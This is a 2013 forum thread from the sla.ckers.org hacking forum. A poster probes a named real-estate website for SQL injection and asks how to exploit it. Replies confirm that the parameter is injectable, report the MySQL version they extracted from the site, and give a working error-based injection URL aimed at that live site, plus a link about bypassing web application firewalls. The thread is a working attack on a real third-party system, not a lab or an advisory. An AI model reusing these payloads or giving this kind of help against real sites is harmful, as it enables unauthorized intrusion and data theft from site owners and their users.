Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
sql syntax error
Posted by: a_tek7
Date: June 05, 2013 11:54AM

http://sellbyowners.com.pk/property_view.php?id=123'&cityid=66&city=Haripur

Error detected:
Mysql error.
Mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123''' at line 2

it means that the first column is vulnerable?

http://sellbyowners.com.pk/property_view.php?id=@@version&cityid=66&city=Haripur

Error detected:
Mysql error.
Mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by property_id desc limit 0, 5' at line 6


how to inject sql?

Options: ReplyQuote
Re: sql syntax error
Posted by: ajkaro
Date: June 05, 2013 12:56PM

You can't just use @@version. Where is union select part?

It is string based injection, only one column, vulnerable column is hidden in <a href> tag in source code so you must make it visible first.

version: 5.0.91-log

Options: ReplyQuote
Re: sql syntax error
Posted by: hack2012
Date: June 05, 2013 10:34PM

http://sellbyowners.com.pk/property_view.php?cityid=66&city=Haripur&id=123' or+1+group+by+concat_ws(0x7e,@@version,floor(rand(0)*2))+having+min(0)+or+1%23

For more Waf bypass Please visit my BLog:

http://www.waitalone.cn/tag/bypass

I am from China !

Options: ReplyQuote


Sorry, only registered users may post in this forum.